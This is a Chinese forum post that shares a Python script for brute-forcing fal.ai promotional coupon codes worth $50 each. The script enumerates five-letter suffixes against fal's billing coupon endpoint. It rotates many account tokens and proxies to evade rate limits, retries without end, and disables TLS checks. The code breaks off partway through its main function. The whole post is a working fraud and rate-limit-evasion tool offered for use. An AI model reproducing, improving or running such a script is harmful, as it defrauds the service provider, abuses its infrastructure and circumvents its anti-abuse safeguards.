一元网络论坛

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 541|回复: 0

fal 50美刀吗?我再教一次,极致速度

[复制链接]

3万

主题

3万

帖子

9万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
96245
发表于 2025-5-23 12:30:23 来自手机 | 显示全部楼层 |阅读模式

想刷fal 50美刀吗?我再教一次,极致速度
福利羊毛

保存为main.py

import asyncio
import configparser
import logging
import os
import signal
import string
import time
from datetime import datetime
from typing import Any, Dict, List, Optional, Set

import httpx

from proxy import get_proxy_url


# 配置日志
def setup_logging(level=logging.WARNING):
    """设置日志配置"""
    logging.basicConfig(
        level=level,
        format="%(asctime)s - %(levelname)s - %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )
    # 减少第三方库的日志输出
    logging.getLogger("httpx").setLevel(logging.ERROR)
    logging.getLogger("httpcore").setLevel(logging.ERROR)

    return logging.getLogger("coupon_tester")


logger = setup_logging()


class Config:
    """配置管理器,从INI文件读取配置"""

    def __init__(self, config_file: str = "config.ini"):
        self.config = configparser.ConfigParser()
        self.config_file = config_file
        self.load_config()

    def load_config(self):
        """加载配置文件"""
        if not os.path.exists(self.config_file):
            self.create_default_config()

        self.config.read(self.config_file)

    def create_default_config(self):
        """创建默认配置文件"""
        config = configparser.ConfigParser()

        # 基本设置
        config["BASIC"] = {
            "num_attempts": "100",
            "max_workers": "10",
            "delay": "0.2",
            "suffix_length": "5",
            "reverse_mode": "false",
            "start_suffix": "",
            "from_start": "false",
        }

        # 代理设置
        config["PROXY"] = {
            "proxies_per_token": "1",
            "requests_per_proxy": "50",
            "unlimited_proxies": "true",
            "country": "",
            "state": "",
            "city": "",
        }

        # 令牌设置
        config["TOKENS"] = {"token_file": "tokens.txt", "tokens": ""}

        # 重试设置
        config["RETRY"] = {
            "max_retries": "3",
            "retry_delay": "2.0",
            "request_timeout": "30.0",
        }

        # 输出设置
        config["OUTPUT"] = {
            "output_dir": "results",
            "invalid_file": "results/all_invalid_coupons.txt",
        }

        with open(self.config_file, "w") as f:
            config.write(f)

        logger.info(f"已创建默认配置文件: {self.config_file}")

    def get_int(self, section: str, key: str, fallback: int = 0) -> int:
        return self.config.getint(section, key, fallback=fallback)

    def get_float(self, section: str, key: str, fallback: float = 0.0) -> float:
        return self.config.getfloat(section, key, fallback=fallback)

    def get_bool(self, section: str, key: str, fallback: bool = False) -> bool:
        return self.config.getboolean(section, key, fallback=fallback)

    def get_str(self, section: str, key: str, fallback: str = "") -> str:
        return self.config.get(section, key, fallback=fallback)


class ProxyManager:
    """代理管理器 - 直接创建代理,不使用代理池"""

    def __init__(
        self,
        country: Optional[str] = None,
        state: Optional[str] = None,
        city: Optional[str] = None,
    ):
        self.country = country
        self.state = state
        self.city = city
        self.proxy_cache: List[str] = []
        self.cache_index = 0
        self.lock = asyncio.Lock()

    async def initialize(self, cache_size: int = 1000):
        """初始化 - 并发创建大量代理缓存以提高速度"""
        logger.info(f"正在并发创建 {cache_size} 个代理...")

        async def create_single_proxy() -> Optional[str]:
            """创建单个代理"""
            try:
                return get_proxy_url(
                    country=self.country, state=self.state, city=self.city
                )
            except Exception:
                return None

        # 并发创建代理,分批处理
        batch_size = 100
        for batch_start in range(0, cache_size, batch_size):
            current_batch_size = min(batch_size, cache_size - batch_start)

            # 创建任务
            tasks = [create_single_proxy() for _ in range(current_batch_size)]

            # 并发执行
            results = await asyncio.gather(*tasks, return_exceptions=True)

            # 收集成功的代理
            for result in results:
                if isinstance(result, str) and result:
                    self.proxy_cache.append(result)

            logger.info(f"已创建 {len(self.proxy_cache)}/{cache_size} 个代理")

        logger.info(f"代理管理器初始化完成 - 已缓存 {len(self.proxy_cache)} 个代理")

    async def get_proxy_url(self) -> Optional[str]:
        """每次都获取新的代理URL - 无限制模式"""
        # 如果缓存不为空,优先使用缓存,但不循环使用
        if self.proxy_cache:
            # 随机选择一个缓存的代理
            import random

            return random.choice(self.proxy_cache)

        # 如果缓存为空或需要新代理,直接创建
        try:
            return get_proxy_url(country=self.country, state=self.state, city=self.city)
        except Exception:
            # 创建失败时,仍然尝试从缓存返回
            if self.proxy_cache:
                import random

                return random.choice(self.proxy_cache)
            return None

    async def close_all(self):
        """清理 - 无需清理"""
        pass


class TokenManager:
    """令牌管理器"""

    def __init__(self, tokens: List[str]):
        self.tokens = tokens
        self.current_index = 0
        self.token_usage = {token: 0 for token in tokens}
        self.lock = asyncio.Lock()

    async def get_token(self) -> str:
        """获取下一个令牌"""
        async with self.lock:
            token = self.tokens[self.current_index]
            self.token_usage[token] += 1
            self.current_index = (self.current_index + 1) % len(self.tokens)
            return token

    def get_stats(self) -> Dict[str, int]:
        """获取令牌使用统计"""
        return self.token_usage.copy()


class SequentialSuffixGenerator:
    """按顺序生成指定长度的字符串"""

    def __init__(self, length: int = 5, reverse: bool = False):
        self.length = length
        self.alphabet = string.ascii_lowercase
        self.base = len(self.alphabet)
        self.current_index = 0
        self.reverse = reverse

        if self.reverse:
            self.current_index = self.base**self.length - 1

    def _index_to_suffix(self, index: int) -> str:
        """将数字索引转换为对应的字符串后缀"""
        if index < 0:
            return ""

        chars = []
        temp_index = index
        for _ in range(self.length):
            chars.append(self.alphabet[temp_index % self.base])
            temp_index //= self.base

        return "".join(reversed(chars))

    def generate_next_suffix(self) -> str:
        """生成下一个后缀"""
        suffix = self._index_to_suffix(self.current_index)
        if self.reverse:
            self.current_index -= 1
        else:
            self.current_index += 1
        return suffix

    def start_from_suffix(self, suffix: str) -> None:
        """设置从指定后缀开始生成"""
        if len(suffix) != self.length:
            logger.warning(f"后缀长度不匹配: {suffix},期望长度: {self.length}")
            return

        # 计算后缀对应的索引
        index = 0
        for i, char in enumerate(suffix):
            pos = self.alphabet.find(char)
            index += pos * (self.base ** (self.length - i - 1))

        self.current_index = index
        logger.info(f"设置索引为: {index},对应后缀: {suffix}")


class CouponTester:
    """优惠券测试器 - 重新设计版本"""

    def __init__(
        self, config: Config, token_manager: TokenManager, proxy_manager: ProxyManager
    ):
        self.config = config
        self.token_manager = token_manager
        self.proxy_manager = proxy_manager
        self.request_timeout = config.get_float("RETRY", "request_timeout", 3.0)

        # 任务管理
        self.active_tasks: Set[asyncio.Task] = set()
        self.max_active_tasks = config.get_int("BASIC", "max_workers", 1000)
        self.task_semaphore = asyncio.Semaphore(self.max_active_tasks)

        # 简化客户端管理
        self.clients: List[httpx.AsyncClient] = []
        self.client_index = 0
        self.client_lock = asyncio.Lock()

    async def initialize_clients(self, num_clients: int = 50):
        """初始化HTTP客户端池"""
        logger.info(f"正在初始化 {num_clients} 个HTTP客户端...")

        # 创建客户端
        for i in range(num_clients):
            proxy_url = await self.proxy_manager.get_proxy_url()

            # 简化的连接设置
            limits = httpx.Limits(
                max_keepalive_connections=50,
                max_connections=100,
                keepalive_expiry=60.0,  # 更长的保活时间,减少重连
            )

            client = httpx.AsyncClient(
                timeout=httpx.Timeout(self.request_timeout),
                proxy=proxy_url,
                limits=limits,
                http2=True,
                verify=False,  # 跳过SSL验证
            )
            self.clients.append(client)

        logger.info(f"已初始化 {len(self.clients)} 个HTTP客户端")

    async def get_client(self):
        """每次都创建新客户端使用不同代理 - 无限制模式"""
        proxy_url = await self.proxy_manager.get_proxy_url()

        # 每次都创建新客户端,确保使用不同代理
        limits = httpx.Limits(
            max_keepalive_connections=10,
            max_connections=20,
            keepalive_expiry=5.0,  # 短期保活
        )

        client = httpx.AsyncClient(
            timeout=httpx.Timeout(self.request_timeout),
            proxy=proxy_url,
            limits=limits,
            http2=True,
            verify=False,
        )
        return client

    async def close_clients(self):
        """关闭所有客户端"""
        for client in self.clients:
            try:
                await client.aclose()
            except:
                pass
        self.clients.clear()

    async def test_coupon(self, suffix: str, result_callback) -> None:
        """测试单个优惠券"""
        async with self.task_semaphore:
            await self._test_coupon_impl(suffix, result_callback)

    async def _test_coupon_impl(self, suffix: str, result_callback):
        """测试优惠券的实际实现 - 无限重试直到成功"""
        coupon_code = f"_eleven50_{suffix}"
        url = f"https://rest.alpha.fal.ai/billing/coupon/{coupon_code}"

        while True:  # 无限重试,直到成功
            client = None
            try:
                # 获取新的令牌和客户端
                token = await self.token_manager.get_token()
                client = await self.get_client()

                headers = {
                    "accept": "application/json",
                    "authorization": f"Bearer {token}",
                    "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
                }

                # 发送请求
                response = await client.post(url, headers=headers)
                response_text = response.text

                # 检查是否是速率限制或其他需要重试的错误
                if (
                    "Rate limit exceeded" in response_text
                    or "timeout" in response_text.lower()
                    or "error" in response_text.lower()
                    or response.status_code >= 500
                ):
                    # 立即换代理和token重试,不延迟
                    continue

                # 如果是正常响应,判断优惠券有效性
                is_valid = not (
                    "Maximum number of claims exceeded" in response_text
                    or "not found" in response_text.lower()
                    or "Invalid" in response_text
                    or "Coupon has expired" in response_text
                    or "expired" in response_text.lower()
                )

                is_already_claimed = "User already claimed this coupon" in response_text
                if is_already_claimed:
                    is_valid = False

                # 成功获得有效响应,返回结果
                await result_callback(
                    coupon_code, is_valid, response_text, is_already_claimed
                )
                return

            except Exception:
                # 任何异常都重试,无延迟
                continue
            finally:
                # 确保关闭客户端
                if client:
                    try:
                        await client.aclose()
                    except:
                        pass


class ResultCollector:
    """结果收集器"""

    def __init__(self, config: Config):
        self.config = config
        self.valid_coupons: List[str] = []
        self.invalid_coupons: List[str] = []
        self.already_claimed_coupons: List[str] = []
        self.processed_count = 0
        self.total_count = 0
        self.start_time = time.time()
        self.lock = asyncio.Lock()

        # 新增:用于速率计算的滑动窗口
        self.recent_completions: List[float] = []  # 存储最近完成的时间戳
        self.window_size = 20  # 滑动窗口大小

        # 创建输出目录
        output_dir = config.get_str("OUTPUT", "output_dir", "results")
        os.makedirs(output_dir, exist_ok=True)

        # 初始化文件
        self._init_files()

    def _init_files(self):
        """初始化输出文件"""
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        self.progress_file = "progress.txt"
        self.response_log_file = "responses.log"
        self.already_claimed_file = "using.txt"

        output_dir = self.config.get_str("OUTPUT", "output_dir", "results")
        self.valid_file = os.path.join(output_dir, f"valid_coupons_{timestamp}.txt")
        self.invalid_file = os.path.join(output_dir, "all_invalid_coupons.txt")

        # 创建或清空文件
        with open(self.progress_file, "w") as f:
            f.write(
                f"优惠券测试进度报告 - 开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n\n"
            )

        with open(self.response_log_file, "w") as f:
            f.write(
                f"优惠券响应日志 - 开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n\n"
            )

        with open(self.already_claimed_file, "w") as f:
            f.write(
                f"已被使用的优惠券 - 开始时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n\n"
            )

    def set_total_count(self, total: int):
        """设置总数"""
        self.total_count = total

    async def collect_result(
        self,
        coupon_code: str,
        is_valid: bool,
        response_text: str,
        is_already_claimed: bool,
    ):
        """收集结果(回调函数)"""
        async with self.lock:
            current_time = time.time()
            self.processed_count += 1

            # 记录完成时间到滑动窗口
            self.recent_completions.append(current_time)
            # 保持窗口大小
            if len(self.recent_completions) > self.window_size:
                self.recent_completions.pop(0)

            # 记录响应日志
            with open(self.response_log_file, "a") as f:
                f.write(f"优惠券: {coupon_code}, 有效: {is_valid}\n")
                f.write(f"响应内容: {response_text}\n")
                if is_already_claimed:
                    f.write("状态: 已被使用\n")
                elif is_valid:
                    f.write("状态: 有效\n")
                else:
                    f.write("状态: 无效\n")
                f.write("-" * 80 + "\n\n")

            # 分类结果
            if is_valid:
                self.valid_coupons.append(coupon_code)
                print(f"\n✅ 有效优惠券: {coupon_code}")
                print(f"响应内容: {response_text}")

                # 立即保存有效优惠券
                with open(self.valid_file, "a") as f:
                    f.write(f"{coupon_code}\n")

            elif is_already_claimed:
                self.already_claimed_coupons.append(coupon_code)
                with open(self.already_claimed_file, "a") as f:
                    f.write(f"{coupon_code}\n")
            else:
                self.invalid_coupons.append(coupon_code)

                # 立即保存无效优惠券
                with open(self.invalid_file, "a") as f:
                    f.write(f"{coupon_code}\n")

            # 更新进度
            self._update_progress(current_time)

    def _update_progress(self, current_time: float):
        """更新进度显示"""
        if self.total_count == 0:
            return

        elapsed = current_time - self.start_time

        # 使用滑动窗口计算更准确的速率
        if len(self.recent_completions) >= 2:
            # 计算滑动窗口内的速率
            window_start = self.recent_completions[0]
            window_end = self.recent_completions[-1]
            window_duration = window_end - window_start

            if window_duration > 0:
                # 窗口内的请求数 / 窗口时间 = 当前速率
                rate = len(self.recent_completions) / window_duration
            else:
                # 如果窗口内时间太短,使用总体速率
                rate = self.processed_count / elapsed if elapsed > 0 else 0
        else:
            # 如果样本不够,使用总体速率
            rate = self.processed_count / elapsed if elapsed > 0 else 0

        eta = (self.total_count - self.processed_count) / rate if rate > 0 else 0
        percent = (self.processed_count / self.total_count) * 100

        # 进度条
        bar_length = 30
        filled_length = int(bar_length * self.processed_count // self.total_count)
        bar = "█" * filled_length + "-" * (bar_length - filled_length)

        print()
        status_line = (
            f"进度: [{bar}] {percent:.1f}% ({self.processed_count}/{self.total_count}) | "
            f"有效: {len(self.valid_coupons)} | 无效: {len(self.invalid_coupons)} | "
            f"已使用: {len(self.already_claimed_coupons)} | "
            f"速率: {rate:.2f}请求/秒 | "
            f"已用时间: {self._format_time(elapsed)} | "
            f"预计剩余: {self._format_time(eta)}"
        )
        print(status_line, end="")

    def _format_time(self, seconds: float) -> str:
        """格式化时间"""
        hours, remainder = divmod(int(seconds), 3600)
        minutes, seconds = divmod(remainder, 60)
        return (
            f"{hours:02d}:{minutes:02d}:{seconds:02d}"
            if hours > 0
            else f"{minutes:02d}:{seconds:02d}"
        )

    def get_summary(self) -> Dict[str, Any]:
        """获取结果摘要"""
        return {
            "total_processed": self.processed_count,
            "valid_count": len(self.valid_coupons),
            "invalid_count": len(self.invalid_coupons),
            "already_claimed_count": len(self.already_claimed_coupons),
            "valid_coupons": self.valid_coupons,
            "elapsed_time": time.time() - self.start_time,
        }


def load_tokens_from_file(file_path: str) -> List[str]:
    """从文件加载认证令牌"""
    if not file_path or not os.path.exists(file_path):
        return []

    tokens = []
    try:
        with open(file_path, "r") as f:
            for line in f:
                token = line.strip()
                if token:
                    tokens.append(token)
        logger.info(f"已从文件加载 {len(tokens)} 个认证令牌")
    except Exception as e:
        logger.error(f"加载认证令牌文件时出错: {str(e)}")

    return tokens


def load_known_invalid_coupons(file_path: str) -> Set[str]:
    """加载已知的无效优惠券"""
    if not os.path.exists(file_path):
        logger.info(f"无效优惠券文件不存在: {file_path}")
        return set()

    invalid_coupons = set()
    try:
        with open(file_path, "r") as f:
            for line in f:
                coupon = line.strip()
                if coupon:
                    if "_eleven50_" in coupon:
                        suffix = coupon.split("_eleven50_")[1]
                        invalid_coupons.add(suffix)
                    elif len(coupon) == 5 and coupon.isalpha() and coupon.islower():
                        invalid_coupons.add(coupon)
        logger.info(f"已加载 {len(invalid_coupons)} 个已知无效优惠券")
    except Exception as e:
        logger.error(f"加载已知无效优惠券时出错: {str(e)}")

    return invalid_coupons


async def main():
    """主函数"""
    # 加载配置
    config = Config()

    # 加载令牌
    tokens = []
    token_file = config.get_str("TOKENS", "token_file", "tokens.txt")
    if token_file:
        tokens.extend(load_tokens_from_file(token_file))

    # 从配置文件中的tokens字段加载
    config_tokens = config.get_str("TOKENS", "tokens", "")
    if config_tokens:
        tokens.extend([t.strip() for t in config_tokens.split(",") if t.strip()])

    if not tokens:
        logger.error("未找到任何认证令牌,请在配置文件中设置token_file或tokens")
        return

    # 去重
    tokens = list(set(tokens))
    logger.info(f"加载了 {len(tokens)} 个唯一的认证令牌")

    # 创建管理器
    token_manager = TokenManager(tokens)

    # 创建代理管理器
    proxy_manager = ProxyManager(
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|一元网络论坛

GMT+8, 2025-5-31 04:10 , Processed in 0.069622 second(s), 19 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表